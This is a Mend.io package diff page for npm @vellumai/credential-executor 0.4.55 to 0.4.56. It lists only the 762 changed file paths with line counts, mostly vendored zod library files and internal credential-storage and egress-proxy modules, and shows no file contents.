npm - @vellumai/credential-executor - Versions diffs - 0.4.55 → 0.4.56 - Mend

@vellumai/credential-executor 0.4.55 → 0.4.56

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (762) hide show

package/Dockerfile +6 -2
package/node_modules/@vellumai/ces-contracts/bun.lock +29 -0
package/node_modules/@vellumai/ces-contracts/package.json +24 -0
package/node_modules/@vellumai/ces-contracts/src/__tests__/contracts.test.ts +293 -0
package/node_modules/@vellumai/ces-contracts/src/__tests__/grants.test.ts +686 -0
package/node_modules/@vellumai/ces-contracts/src/error.ts +25 -0
package/node_modules/@vellumai/ces-contracts/src/grants.ts +184 -0
package/node_modules/@vellumai/ces-contracts/src/handles.ts +213 -0
package/node_modules/@vellumai/ces-contracts/src/index.ts +147 -0
package/node_modules/@vellumai/ces-contracts/src/rendering.ts +135 -0
package/node_modules/@vellumai/ces-contracts/src/rpc.ts +511 -0
package/node_modules/@vellumai/ces-contracts/tsconfig.json +20 -0
package/node_modules/@vellumai/credential-storage/bun.lock +24 -0
package/node_modules/@vellumai/credential-storage/package.json +17 -0
package/node_modules/@vellumai/credential-storage/src/__tests__/package-boundary.test.ts +151 -0
package/node_modules/@vellumai/credential-storage/src/index.ts +213 -0
package/node_modules/@vellumai/credential-storage/src/oauth-runtime.ts +340 -0
package/node_modules/@vellumai/credential-storage/src/static-credentials.ts +365 -0
package/node_modules/@vellumai/credential-storage/tsconfig.json +20 -0
package/node_modules/@vellumai/egress-proxy/bun.lock +24 -0
package/node_modules/@vellumai/egress-proxy/package.json +17 -0
package/node_modules/@vellumai/egress-proxy/src/__tests__/package-boundary.test.ts +131 -0
package/node_modules/@vellumai/egress-proxy/src/index.ts +54 -0
package/node_modules/@vellumai/egress-proxy/src/session-core.ts +466 -0
package/node_modules/@vellumai/egress-proxy/src/types.ts +227 -0
package/node_modules/@vellumai/egress-proxy/tsconfig.json +20 -0
package/node_modules/zod/LICENSE +21 -0
package/node_modules/zod/README.md +208 -0
package/node_modules/zod/index.cjs +33 -0
package/node_modules/zod/index.d.cts +4 -0
package/node_modules/zod/index.d.ts +4 -0
package/node_modules/zod/index.js +4 -0
package/node_modules/zod/locales/index.cjs +17 -0
package/node_modules/zod/locales/index.d.cts +1 -0
package/node_modules/zod/locales/index.d.ts +1 -0
package/node_modules/zod/locales/index.js +1 -0
package/node_modules/zod/locales/package.json +6 -0
package/node_modules/zod/mini/index.cjs +32 -0
package/node_modules/zod/mini/index.d.cts +3 -0
package/node_modules/zod/mini/index.d.ts +3 -0
package/node_modules/zod/mini/index.js +3 -0
package/node_modules/zod/mini/package.json +6 -0
package/node_modules/zod/package.json +135 -0
package/node_modules/zod/src/index.ts +4 -0
package/node_modules/zod/src/locales/index.ts +1 -0
package/node_modules/zod/src/mini/index.ts +3 -0
package/node_modules/zod/src/v3/ZodError.ts +330 -0
package/node_modules/zod/src/v3/benchmarks/datetime.ts +58 -0
package/node_modules/zod/src/v3/benchmarks/discriminatedUnion.ts +80 -0
package/node_modules/zod/src/v3/benchmarks/index.ts +59 -0
package/node_modules/zod/src/v3/benchmarks/ipv4.ts +57 -0
package/node_modules/zod/src/v3/benchmarks/object.ts +69 -0
package/node_modules/zod/src/v3/benchmarks/primitives.ts +162 -0
package/node_modules/zod/src/v3/benchmarks/realworld.ts +63 -0
package/node_modules/zod/src/v3/benchmarks/string.ts +55 -0
package/node_modules/zod/src/v3/benchmarks/union.ts +80 -0
package/node_modules/zod/src/v3/errors.ts +13 -0
package/node_modules/zod/src/v3/external.ts +6 -0
package/node_modules/zod/src/v3/helpers/enumUtil.ts +17 -0
package/node_modules/zod/src/v3/helpers/errorUtil.ts +8 -0
package/node_modules/zod/src/v3/helpers/parseUtil.ts +176 -0
package/node_modules/zod/src/v3/helpers/partialUtil.ts +34 -0
package/node_modules/zod/src/v3/helpers/typeAliases.ts +2 -0
package/node_modules/zod/src/v3/helpers/util.ts +224 -0
package/node_modules/zod/src/v3/index.ts +4 -0
package/node_modules/zod/src/v3/locales/en.ts +124 -0
package/node_modules/zod/src/v3/standard-schema.ts +113 -0
package/node_modules/zod/src/v3/tests/Mocker.ts +54 -0
package/node_modules/zod/src/v3/tests/all-errors.test.ts +157 -0
package/node_modules/zod/src/v3/tests/anyunknown.test.ts +28 -0
package/node_modules/zod/src/v3/tests/array.test.ts +71 -0
package/node_modules/zod/src/v3/tests/async-parsing.test.ts +388 -0
package/node_modules/zod/src/v3/tests/async-refinements.test.ts +46 -0
package/node_modules/zod/src/v3/tests/base.test.ts +29 -0
package/node_modules/zod/src/v3/tests/bigint.test.ts +55 -0
package/node_modules/zod/src/v3/tests/branded.test.ts +53 -0
package/node_modules/zod/src/v3/tests/catch.test.ts +220 -0
package/node_modules/zod/src/v3/tests/coerce.test.ts +133 -0
package/node_modules/zod/src/v3/tests/complex.test.ts +70 -0
package/node_modules/zod/src/v3/tests/custom.test.ts +31 -0
package/node_modules/zod/src/v3/tests/date.test.ts +32 -0
package/node_modules/zod/src/v3/tests/deepmasking.test.ts +186 -0
package/node_modules/zod/src/v3/tests/default.test.ts +112 -0
package/node_modules/zod/src/v3/tests/description.test.ts +33 -0
package/node_modules/zod/src/v3/tests/discriminated-unions.test.ts +315 -0
package/node_modules/zod/src/v3/tests/enum.test.ts +80 -0
package/node_modules/zod/src/v3/tests/error.test.ts +551 -0
package/node_modules/zod/src/v3/tests/firstparty.test.ts +87 -0
package/node_modules/zod/src/v3/tests/firstpartyschematypes.test.ts +21 -0
package/node_modules/zod/src/v3/tests/function.test.ts +261 -0
package/node_modules/zod/src/v3/tests/generics.test.ts +48 -0
package/node_modules/zod/src/v3/tests/instanceof.test.ts +37 -0
package/node_modules/zod/src/v3/tests/intersection.test.ts +110 -0
package/node_modules/zod/src/v3/tests/language-server.source.ts +76 -0
package/node_modules/zod/src/v3/tests/language-server.test.ts +207 -0
package/node_modules/zod/src/v3/tests/literal.test.ts +36 -0
package/node_modules/zod/src/v3/tests/map.test.ts +110 -0
package/node_modules/zod/src/v3/tests/masking.test.ts +4 -0
package/node_modules/zod/src/v3/tests/mocker.test.ts +19 -0
package/node_modules/zod/src/v3/tests/nan.test.ts +24 -0
package/node_modules/zod/src/v3/tests/nativeEnum.test.ts +87 -0
package/node_modules/zod/src/v3/tests/nullable.test.ts +42 -0
package/node_modules/zod/src/v3/tests/number.test.ts +176 -0
package/node_modules/zod/src/v3/tests/object-augmentation.test.ts +29 -0
package/node_modules/zod/src/v3/tests/object-in-es5-env.test.ts +29 -0
package/node_modules/zod/src/v3/tests/object.test.ts +434 -0
package/node_modules/zod/src/v3/tests/optional.test.ts +42 -0
package/node_modules/zod/src/v3/tests/parseUtil.test.ts +23 -0
package/node_modules/zod/src/v3/tests/parser.test.ts +41 -0
package/node_modules/zod/src/v3/tests/partials.test.ts +243 -0
package/node_modules/zod/src/v3/tests/pickomit.test.ts +111 -0
package/node_modules/zod/src/v3/tests/pipeline.test.ts +29 -0
package/node_modules/zod/src/v3/tests/preprocess.test.ts +186 -0
package/node_modules/zod/src/v3/tests/primitive.test.ts +440 -0
package/node_modules/zod/src/v3/tests/promise.test.ts +90 -0
package/node_modules/zod/src/v3/tests/readonly.test.ts +194 -0
package/node_modules/zod/src/v3/tests/record.test.ts +171 -0
package/node_modules/zod/src/v3/tests/recursive.test.ts +197 -0
package/node_modules/zod/src/v3/tests/refine.test.ts +313 -0
package/node_modules/zod/src/v3/tests/safeparse.test.ts +27 -0
package/node_modules/zod/src/v3/tests/set.test.ts +142 -0
package/node_modules/zod/src/v3/tests/standard-schema.test.ts +83 -0
package/node_modules/zod/src/v3/tests/string.test.ts +916 -0
package/node_modules/zod/src/v3/tests/transformer.test.ts +233 -0
package/node_modules/zod/src/v3/tests/tuple.test.ts +90 -0
package/node_modules/zod/src/v3/tests/unions.test.ts +57 -0
package/node_modules/zod/src/v3/tests/validations.test.ts +133 -0
package/node_modules/zod/src/v3/tests/void.test.ts +15 -0
package/node_modules/zod/src/v3/types.ts +5138 -0
package/node_modules/zod/src/v4/classic/checks.ts +32 -0
package/node_modules/zod/src/v4/classic/coerce.ts +27 -0
package/node_modules/zod/src/v4/classic/compat.ts +70 -0
package/node_modules/zod/src/v4/classic/errors.ts +82 -0
package/node_modules/zod/src/v4/classic/external.ts +51 -0
package/node_modules/zod/src/v4/classic/from-json-schema.ts +643 -0
package/node_modules/zod/src/v4/classic/index.ts +5 -0
package/node_modules/zod/src/v4/classic/iso.ts +90 -0
package/node_modules/zod/src/v4/classic/parse.ts +82 -0
package/node_modules/zod/src/v4/classic/schemas.ts +2409 -0
package/node_modules/zod/src/v4/classic/tests/anyunknown.test.ts +26 -0
package/node_modules/zod/src/v4/classic/tests/apply.test.ts +59 -0
package/node_modules/zod/src/v4/classic/tests/array.test.ts +264 -0
package/node_modules/zod/src/v4/classic/tests/assignability.test.ts +210 -0
package/node_modules/zod/src/v4/classic/tests/async-parsing.test.ts +381 -0
package/node_modules/zod/src/v4/classic/tests/async-refinements.test.ts +68 -0
package/node_modules/zod/src/v4/classic/tests/base.test.ts +7 -0
package/node_modules/zod/src/v4/classic/tests/bigint.test.ts +54 -0
package/node_modules/zod/src/v4/classic/tests/brand.test.ts +106 -0
package/node_modules/zod/src/v4/classic/tests/catch.test.ts +276 -0
package/node_modules/zod/src/v4/classic/tests/coalesce.test.ts +20 -0
package/node_modules/zod/src/v4/classic/tests/codec-examples.test.ts +573 -0
package/node_modules/zod/src/v4/classic/tests/codec.test.ts +562 -0
package/node_modules/zod/src/v4/classic/tests/coerce.test.ts +160 -0
package/node_modules/zod/src/v4/classic/tests/continuability.test.ts +374 -0
package/node_modules/zod/src/v4/classic/tests/custom.test.ts +40 -0
package/node_modules/zod/src/v4/classic/tests/date.test.ts +62 -0
package/node_modules/zod/src/v4/classic/tests/datetime.test.ts +302 -0
package/node_modules/zod/src/v4/classic/tests/default.test.ts +365 -0
package/node_modules/zod/src/v4/classic/tests/describe-meta-checks.test.ts +27 -0
package/node_modules/zod/src/v4/classic/tests/description.test.ts +32 -0
package/node_modules/zod/src/v4/classic/tests/discriminated-unions.test.ts +661 -0
package/node_modules/zod/src/v4/classic/tests/enum.test.ts +285 -0
package/node_modules/zod/src/v4/classic/tests/error-utils.test.ts +595 -0
package/node_modules/zod/src/v4/classic/tests/error.test.ts +711 -0
package/node_modules/zod/src/v4/classic/tests/file.test.ts +96 -0
package/node_modules/zod/src/v4/classic/tests/firstparty.test.ts +179 -0
package/node_modules/zod/src/v4/classic/tests/fix-json-issue.test.ts +26 -0
package/node_modules/zod/src/v4/classic/tests/from-json-schema.test.ts +734 -0
package/node_modules/zod/src/v4/classic/tests/function.test.ts +360 -0
package/node_modules/zod/src/v4/classic/tests/generics.test.ts +72 -0
package/node_modules/zod/src/v4/classic/tests/hash.test.ts +68 -0
package/node_modules/zod/src/v4/classic/tests/index.test.ts +939 -0
package/node_modules/zod/src/v4/classic/tests/instanceof.test.ts +60 -0
package/node_modules/zod/src/v4/classic/tests/intersection.test.ts +198 -0
package/node_modules/zod/src/v4/classic/tests/json.test.ts +109 -0
package/node_modules/zod/src/v4/classic/tests/lazy.test.ts +227 -0
package/node_modules/zod/src/v4/classic/tests/literal.test.ts +117 -0
package/node_modules/zod/src/v4/classic/tests/map.test.ts +330 -0
package/node_modules/zod/src/v4/classic/tests/nan.test.ts +21 -0
package/node_modules/zod/src/v4/classic/tests/nested-refine.test.ts +168 -0
package/node_modules/zod/src/v4/classic/tests/nonoptional.test.ts +101 -0
package/node_modules/zod/src/v4/classic/tests/nullable.test.ts +22 -0
package/node_modules/zod/src/v4/classic/tests/number.test.ts +270 -0
package/node_modules/zod/src/v4/classic/tests/object.test.ts +640 -0
package/node_modules/zod/src/v4/classic/tests/optional.test.ts +223 -0
package/node_modules/zod/src/v4/classic/tests/partial.test.ts +427 -0
package/node_modules/zod/src/v4/classic/tests/pickomit.test.ts +211 -0
package/node_modules/zod/src/v4/classic/tests/pipe.test.ts +101 -0
package/node_modules/zod/src/v4/classic/tests/prefault.test.ts +74 -0
package/node_modules/zod/src/v4/classic/tests/preprocess.test.ts +282 -0
package/node_modules/zod/src/v4/classic/tests/primitive.test.ts +175 -0
package/node_modules/zod/src/v4/classic/tests/promise.test.ts +81 -0
package/node_modules/zod/src/v4/classic/tests/prototypes.test.ts +23 -0
package/node_modules/zod/src/v4/classic/tests/readonly.test.ts +252 -0
package/node_modules/zod/src/v4/classic/tests/record.test.ts +632 -0
package/node_modules/zod/src/v4/classic/tests/recursive-types.test.ts +582 -0
package/node_modules/zod/src/v4/classic/tests/refine.test.ts +570 -0
package/node_modules/zod/src/v4/classic/tests/registries.test.ts +243 -0
package/node_modules/zod/src/v4/classic/tests/set.test.ts +181 -0
package/node_modules/zod/src/v4/classic/tests/standard-schema.test.ts +134 -0
package/node_modules/zod/src/v4/classic/tests/string-formats.test.ts +125 -0
package/node_modules/zod/src/v4/classic/tests/string.test.ts +1175 -0
package/node_modules/zod/src/v4/classic/tests/stringbool.test.ts +106 -0
package/node_modules/zod/src/v4/classic/tests/template-literal.test.ts +771 -0
package/node_modules/zod/src/v4/classic/tests/to-json-schema-methods.test.ts +438 -0
package/node_modules/zod/src/v4/classic/tests/to-json-schema.test.ts +2990 -0
package/node_modules/zod/src/v4/classic/tests/transform.test.ts +361 -0
package/node_modules/zod/src/v4/classic/tests/tuple.test.ts +183 -0
package/node_modules/zod/src/v4/classic/tests/union.test.ts +219 -0
package/node_modules/zod/src/v4/classic/tests/url.test.ts +13 -0
package/node_modules/zod/src/v4/classic/tests/validations.test.ts +283 -0
package/node_modules/zod/src/v4/classic/tests/void.test.ts +12 -0
package/node_modules/zod/src/v4/core/api.ts +1798 -0
package/node_modules/zod/src/v4/core/checks.ts +1293 -0
package/node_modules/zod/src/v4/core/config.ts +15 -0
package/node_modules/zod/src/v4/core/core.ts +138 -0
package/node_modules/zod/src/v4/core/doc.ts +44 -0
package/node_modules/zod/src/v4/core/errors.ts +448 -0
package/node_modules/zod/src/v4/core/index.ts +16 -0
package/node_modules/zod/src/v4/core/json-schema-generator.ts +126 -0
package/node_modules/zod/src/v4/core/json-schema-processors.ts +667 -0
package/node_modules/zod/src/v4/core/json-schema.ts +147 -0
package/node_modules/zod/src/v4/core/parse.ts +195 -0
package/node_modules/zod/src/v4/core/regexes.ts +183 -0
package/node_modules/zod/src/v4/core/registries.ts +105 -0
package/node_modules/zod/src/v4/core/schemas.ts +4538 -0
package/node_modules/zod/src/v4/core/standard-schema.ts +159 -0
package/node_modules/zod/src/v4/core/tests/extend.test.ts +59 -0
package/node_modules/zod/src/v4/core/tests/index.test.ts +46 -0
package/node_modules/zod/src/v4/core/tests/locales/be.test.ts +124 -0
package/node_modules/zod/src/v4/core/tests/locales/en.test.ts +22 -0
package/node_modules/zod/src/v4/core/tests/locales/es.test.ts +181 -0
package/node_modules/zod/src/v4/core/tests/locales/he.test.ts +379 -0
package/node_modules/zod/src/v4/core/tests/locales/nl.test.ts +46 -0
package/node_modules/zod/src/v4/core/tests/locales/ru.test.ts +128 -0
package/node_modules/zod/src/v4/core/tests/locales/tr.test.ts +69 -0
package/node_modules/zod/src/v4/core/tests/locales/uz.test.ts +83 -0
package/node_modules/zod/src/v4/core/tests/record-constructor.test.ts +67 -0
package/node_modules/zod/src/v4/core/tests/recursive-tuples.test.ts +45 -0
package/node_modules/zod/src/v4/core/to-json-schema.ts +613 -0
package/node_modules/zod/src/v4/core/util.ts +966 -0
package/node_modules/zod/src/v4/core/versions.ts +5 -0
package/node_modules/zod/src/v4/core/zsf.ts +323 -0
package/node_modules/zod/src/v4/index.ts +4 -0
package/node_modules/zod/src/v4/locales/ar.ts +115 -0
package/node_modules/zod/src/v4/locales/az.ts +111 -0
package/node_modules/zod/src/v4/locales/be.ts +176 -0
package/node_modules/zod/src/v4/locales/bg.ts +128 -0
package/node_modules/zod/src/v4/locales/ca.ts +116 -0
package/node_modules/zod/src/v4/locales/cs.ts +118 -0
package/node_modules/zod/src/v4/locales/da.ts +123 -0
package/node_modules/zod/src/v4/locales/de.ts +116 -0
package/node_modules/zod/src/v4/locales/en.ts +119 -0
package/node_modules/zod/src/v4/locales/eo.ts +118 -0
package/node_modules/zod/src/v4/locales/es.ts +141 -0
package/node_modules/zod/src/v4/locales/fa.ts +126 -0
package/node_modules/zod/src/v4/locales/fi.ts +121 -0
package/node_modules/zod/src/v4/locales/fr-CA.ts +116 -0
package/node_modules/zod/src/v4/locales/fr.ts +116 -0
package/node_modules/zod/src/v4/locales/he.ts +246 -0
package/node_modules/zod/src/v4/locales/hu.ts +117 -0
package/node_modules/zod/src/v4/locales/hy.ts +164 -0
package/node_modules/zod/src/v4/locales/id.ts +115 -0
package/node_modules/zod/src/v4/locales/index.ts +49 -0
package/node_modules/zod/src/v4/locales/is.ts +119 -0
package/node_modules/zod/src/v4/locales/it.ts +116 -0
package/node_modules/zod/src/v4/locales/ja.ts +114 -0
package/node_modules/zod/src/v4/locales/ka.ts +123 -0
package/node_modules/zod/src/v4/locales/kh.ts +7 -0
package/node_modules/zod/src/v4/locales/km.ts +119 -0
package/node_modules/zod/src/v4/locales/ko.ts +121 -0
package/node_modules/zod/src/v4/locales/lt.ts +239 -0
package/node_modules/zod/src/v4/locales/mk.ts +118 -0
package/node_modules/zod/src/v4/locales/ms.ts +115 -0
package/node_modules/zod/src/v4/locales/nl.ts +121 -0
package/node_modules/zod/src/v4/locales/no.ts +116 -0
package/node_modules/zod/src/v4/locales/ota.ts +117 -0
package/node_modules/zod/src/v4/locales/pl.ts +118 -0
package/node_modules/zod/src/v4/locales/ps.ts +126 -0
package/node_modules/zod/src/v4/locales/pt.ts +116 -0
package/node_modules/zod/src/v4/locales/ru.ts +176 -0
package/node_modules/zod/src/v4/locales/sl.ts +118 -0
package/node_modules/zod/src/v4/locales/sv.ts +119 -0
package/node_modules/zod/src/v4/locales/ta.ts +118 -0
package/node_modules/zod/src/v4/locales/th.ts +119 -0
package/node_modules/zod/src/v4/locales/tr.ts +111 -0
package/node_modules/zod/src/v4/locales/ua.ts +7 -0
package/node_modules/zod/src/v4/locales/uk.ts +117 -0
package/node_modules/zod/src/v4/locales/ur.ts +119 -0
package/node_modules/zod/src/v4/locales/uz.ts +116 -0
package/node_modules/zod/src/v4/locales/vi.ts +117 -0
package/node_modules/zod/src/v4/locales/yo.ts +124 -0
package/node_modules/zod/src/v4/locales/zh-CN.ts +116 -0
package/node_modules/zod/src/v4/locales/zh-TW.ts +115 -0
package/node_modules/zod/src/v4/mini/checks.ts +32 -0
package/node_modules/zod/src/v4/mini/coerce.ts +27 -0
package/node_modules/zod/src/v4/mini/external.ts +40 -0
package/node_modules/zod/src/v4/mini/index.ts +3 -0
package/node_modules/zod/src/v4/mini/iso.ts +66 -0
package/node_modules/zod/src/v4/mini/parse.ts +14 -0
package/node_modules/zod/src/v4/mini/schemas.ts +1916 -0
package/node_modules/zod/src/v4/mini/tests/apply.test.ts +24 -0
package/node_modules/zod/src/v4/mini/tests/assignability.test.ts +129 -0
package/node_modules/zod/src/v4/mini/tests/brand.test.ts +94 -0
package/node_modules/zod/src/v4/mini/tests/checks.test.ts +144 -0
package/node_modules/zod/src/v4/mini/tests/codec.test.ts +529 -0
package/node_modules/zod/src/v4/mini/tests/computed.test.ts +36 -0
package/node_modules/zod/src/v4/mini/tests/error.test.ts +22 -0
package/node_modules/zod/src/v4/mini/tests/functions.test.ts +5 -0
package/node_modules/zod/src/v4/mini/tests/index.test.ts +963 -0
package/node_modules/zod/src/v4/mini/tests/number.test.ts +95 -0
package/node_modules/zod/src/v4/mini/tests/object.test.ts +227 -0
package/node_modules/zod/src/v4/mini/tests/prototypes.test.ts +43 -0
package/node_modules/zod/src/v4/mini/tests/recursive-types.test.ts +275 -0
package/node_modules/zod/src/v4/mini/tests/standard-schema.test.ts +50 -0
package/node_modules/zod/src/v4/mini/tests/string.test.ts +347 -0
package/node_modules/zod/src/v4-mini/index.ts +3 -0
package/node_modules/zod/v3/ZodError.cjs +138 -0
package/node_modules/zod/v3/ZodError.d.cts +164 -0
package/node_modules/zod/v3/ZodError.d.ts +164 -0
package/node_modules/zod/v3/ZodError.js +133 -0
package/node_modules/zod/v3/errors.cjs +17 -0
package/node_modules/zod/v3/errors.d.cts +5 -0
package/node_modules/zod/v3/errors.d.ts +5 -0
package/node_modules/zod/v3/errors.js +9 -0
package/node_modules/zod/v3/external.cjs +22 -0
package/node_modules/zod/v3/external.d.cts +6 -0
package/node_modules/zod/v3/external.d.ts +6 -0
package/node_modules/zod/v3/external.js +6 -0
package/node_modules/zod/v3/helpers/enumUtil.cjs +2 -0
package/node_modules/zod/v3/helpers/enumUtil.d.cts +8 -0
package/node_modules/zod/v3/helpers/enumUtil.d.ts +8 -0
package/node_modules/zod/v3/helpers/enumUtil.js +1 -0
package/node_modules/zod/v3/helpers/errorUtil.cjs +9 -0
package/node_modules/zod/v3/helpers/errorUtil.d.cts +9 -0
package/node_modules/zod/v3/helpers/errorUtil.d.ts +9 -0
package/node_modules/zod/v3/helpers/errorUtil.js +6 -0
package/node_modules/zod/v3/helpers/parseUtil.cjs +124 -0
package/node_modules/zod/v3/helpers/parseUtil.d.cts +78 -0
package/node_modules/zod/v3/helpers/parseUtil.d.ts +78 -0
package/node_modules/zod/v3/helpers/parseUtil.js +109 -0
package/node_modules/zod/v3/helpers/partialUtil.cjs +2 -0
package/node_modules/zod/v3/helpers/partialUtil.d.cts +8 -0
package/node_modules/zod/v3/helpers/partialUtil.d.ts +8 -0
package/node_modules/zod/v3/helpers/partialUtil.js +1 -0
package/node_modules/zod/v3/helpers/typeAliases.cjs +2 -0
package/node_modules/zod/v3/helpers/typeAliases.d.cts +2 -0
package/node_modules/zod/v3/helpers/typeAliases.d.ts +2 -0
package/node_modules/zod/v3/helpers/typeAliases.js +1 -0
package/node_modules/zod/v3/helpers/util.cjs +137 -0
package/node_modules/zod/v3/helpers/util.d.cts +85 -0
package/node_modules/zod/v3/helpers/util.d.ts +85 -0
package/node_modules/zod/v3/helpers/util.js +133 -0
package/node_modules/zod/v3/index.cjs +33 -0
package/node_modules/zod/v3/index.d.cts +4 -0
package/node_modules/zod/v3/index.d.ts +4 -0
package/node_modules/zod/v3/index.js +4 -0
package/node_modules/zod/v3/locales/en.cjs +112 -0
package/node_modules/zod/v3/locales/en.d.cts +3 -0
package/node_modules/zod/v3/locales/en.d.ts +3 -0
package/node_modules/zod/v3/locales/en.js +109 -0
package/node_modules/zod/v3/package.json +6 -0
package/node_modules/zod/v3/standard-schema.cjs +2 -0
package/node_modules/zod/v3/standard-schema.d.cts +102 -0
package/node_modules/zod/v3/standard-schema.d.ts +102 -0
package/node_modules/zod/v3/standard-schema.js +1 -0
package/node_modules/zod/v3/types.cjs +3777 -0
package/node_modules/zod/v3/types.d.cts +1034 -0
package/node_modules/zod/v3/types.d.ts +1034 -0
package/node_modules/zod/v3/types.js +3695 -0
package/node_modules/zod/v4/classic/checks.cjs +33 -0
package/node_modules/zod/v4/classic/checks.d.cts +1 -0
package/node_modules/zod/v4/classic/checks.d.ts +1 -0
package/node_modules/zod/v4/classic/checks.js +1 -0
package/node_modules/zod/v4/classic/coerce.cjs +47 -0
package/node_modules/zod/v4/classic/coerce.d.cts +17 -0
package/node_modules/zod/v4/classic/coerce.d.ts +17 -0
package/node_modules/zod/v4/classic/coerce.js +17 -0
package/node_modules/zod/v4/classic/compat.cjs +61 -0
package/node_modules/zod/v4/classic/compat.d.cts +50 -0
package/node_modules/zod/v4/classic/compat.d.ts +50 -0
package/node_modules/zod/v4/classic/compat.js +31 -0
package/node_modules/zod/v4/classic/errors.cjs +74 -0
package/node_modules/zod/v4/classic/errors.d.cts +30 -0
package/node_modules/zod/v4/classic/errors.d.ts +30 -0
package/node_modules/zod/v4/classic/errors.js +48 -0
package/node_modules/zod/v4/classic/external.cjs +73 -0
package/node_modules/zod/v4/classic/external.d.cts +15 -0
package/node_modules/zod/v4/classic/external.d.ts +15 -0
package/node_modules/zod/v4/classic/external.js +20 -0
package/node_modules/zod/v4/classic/from-json-schema.cjs +610 -0
package/node_modules/zod/v4/classic/from-json-schema.d.cts +12 -0
package/node_modules/zod/v4/classic/from-json-schema.d.ts +12 -0
package/node_modules/zod/v4/classic/from-json-schema.js +584 -0
package/node_modules/zod/v4/classic/index.cjs +33 -0
package/node_modules/zod/v4/classic/index.d.cts +4 -0
package/node_modules/zod/v4/classic/index.d.ts +4 -0
package/node_modules/zod/v4/classic/index.js +4 -0
package/node_modules/zod/v4/classic/iso.cjs +60 -0
package/node_modules/zod/v4/classic/iso.d.cts +22 -0
package/node_modules/zod/v4/classic/iso.d.ts +22 -0
package/node_modules/zod/v4/classic/iso.js +30 -0
package/node_modules/zod/v4/classic/package.json +6 -0
package/node_modules/zod/v4/classic/parse.cjs +41 -0
package/node_modules/zod/v4/classic/parse.d.cts +31 -0
package/node_modules/zod/v4/classic/parse.d.ts +31 -0
package/node_modules/zod/v4/classic/parse.js +15 -0
package/node_modules/zod/v4/classic/schemas.cjs +1272 -0
package/node_modules/zod/v4/classic/schemas.d.cts +739 -0
package/node_modules/zod/v4/classic/schemas.d.ts +739 -0
package/node_modules/zod/v4/classic/schemas.js +1157 -0
package/node_modules/zod/v4/core/api.cjs +1222 -0
package/node_modules/zod/v4/core/api.d.cts +304 -0
package/node_modules/zod/v4/core/api.d.ts +304 -0
package/node_modules/zod/v4/core/api.js +1082 -0
package/node_modules/zod/v4/core/checks.cjs +601 -0
package/node_modules/zod/v4/core/checks.d.cts +278 -0
package/node_modules/zod/v4/core/checks.d.ts +278 -0
package/node_modules/zod/v4/core/checks.js +575 -0
package/node_modules/zod/v4/core/core.cjs +83 -0
package/node_modules/zod/v4/core/core.d.cts +70 -0
package/node_modules/zod/v4/core/core.d.ts +70 -0
package/node_modules/zod/v4/core/core.js +76 -0
package/node_modules/zod/v4/core/doc.cjs +39 -0
package/node_modules/zod/v4/core/doc.d.cts +14 -0
package/node_modules/zod/v4/core/doc.d.ts +14 -0
package/node_modules/zod/v4/core/doc.js +35 -0
package/node_modules/zod/v4/core/errors.cjs +213 -0
package/node_modules/zod/v4/core/errors.d.cts +220 -0
package/node_modules/zod/v4/core/errors.d.ts +220 -0
package/node_modules/zod/v4/core/errors.js +182 -0
package/node_modules/zod/v4/core/index.cjs +47 -0
package/node_modules/zod/v4/core/index.d.cts +16 -0
package/node_modules/zod/v4/core/index.d.ts +16 -0
package/node_modules/zod/v4/core/index.js +16 -0
package/node_modules/zod/v4/core/json-schema-generator.cjs +99 -0
package/node_modules/zod/v4/core/json-schema-generator.d.cts +65 -0
package/node_modules/zod/v4/core/json-schema-generator.d.ts +65 -0
package/node_modules/zod/v4/core/json-schema-generator.js +95 -0
package/node_modules/zod/v4/core/json-schema-processors.cjs +648 -0
package/node_modules/zod/v4/core/json-schema-processors.d.cts +49 -0
package/node_modules/zod/v4/core/json-schema-processors.d.ts +49 -0
package/node_modules/zod/v4/core/json-schema-processors.js +605 -0
package/node_modules/zod/v4/core/json-schema.cjs +2 -0
package/node_modules/zod/v4/core/json-schema.d.cts +88 -0
package/node_modules/zod/v4/core/json-schema.d.ts +88 -0
package/node_modules/zod/v4/core/json-schema.js +1 -0
package/node_modules/zod/v4/core/package.json +6 -0
package/node_modules/zod/v4/core/parse.cjs +131 -0
package/node_modules/zod/v4/core/parse.d.cts +49 -0
package/node_modules/zod/v4/core/parse.d.ts +49 -0
package/node_modules/zod/v4/core/parse.js +93 -0
package/node_modules/zod/v4/core/regexes.cjs +166 -0
package/node_modules/zod/v4/core/regexes.d.cts +79 -0
package/node_modules/zod/v4/core/regexes.d.ts +79 -0
package/node_modules/zod/v4/core/regexes.js +133 -0
package/node_modules/zod/v4/core/registries.cjs +56 -0
package/node_modules/zod/v4/core/registries.d.cts +35 -0
package/node_modules/zod/v4/core/registries.d.ts +35 -0
package/node_modules/zod/v4/core/registries.js +51 -0
package/node_modules/zod/v4/core/schemas.cjs +2124 -0
package/node_modules/zod/v4/core/schemas.d.cts +1146 -0
package/node_modules/zod/v4/core/schemas.d.ts +1146 -0
package/node_modules/zod/v4/core/schemas.js +2093 -0
package/node_modules/zod/v4/core/standard-schema.cjs +2 -0
package/node_modules/zod/v4/core/standard-schema.d.cts +126 -0
package/node_modules/zod/v4/core/standard-schema.d.ts +126 -0
package/node_modules/zod/v4/core/standard-schema.js +1 -0
package/node_modules/zod/v4/core/to-json-schema.cjs +446 -0
package/node_modules/zod/v4/core/to-json-schema.d.cts +114 -0
package/node_modules/zod/v4/core/to-json-schema.d.ts +114 -0
package/node_modules/zod/v4/core/to-json-schema.js +437 -0
package/node_modules/zod/v4/core/util.cjs +710 -0
package/node_modules/zod/v4/core/util.d.cts +199 -0
package/node_modules/zod/v4/core/util.d.ts +199 -0
package/node_modules/zod/v4/core/util.js +651 -0
package/node_modules/zod/v4/core/versions.cjs +8 -0
package/node_modules/zod/v4/core/versions.d.cts +5 -0
package/node_modules/zod/v4/core/versions.d.ts +5 -0
package/node_modules/zod/v4/core/versions.js +5 -0
package/node_modules/zod/v4/index.cjs +22 -0
package/node_modules/zod/v4/index.d.cts +3 -0
package/node_modules/zod/v4/index.d.ts +3 -0
package/node_modules/zod/v4/index.js +3 -0
package/node_modules/zod/v4/locales/ar.cjs +133 -0
package/node_modules/zod/v4/locales/ar.d.cts +5 -0
package/node_modules/zod/v4/locales/ar.d.ts +4 -0
package/node_modules/zod/v4/locales/ar.js +106 -0
package/node_modules/zod/v4/locales/az.cjs +132 -0
package/node_modules/zod/v4/locales/az.d.cts +5 -0
package/node_modules/zod/v4/locales/az.d.ts +4 -0
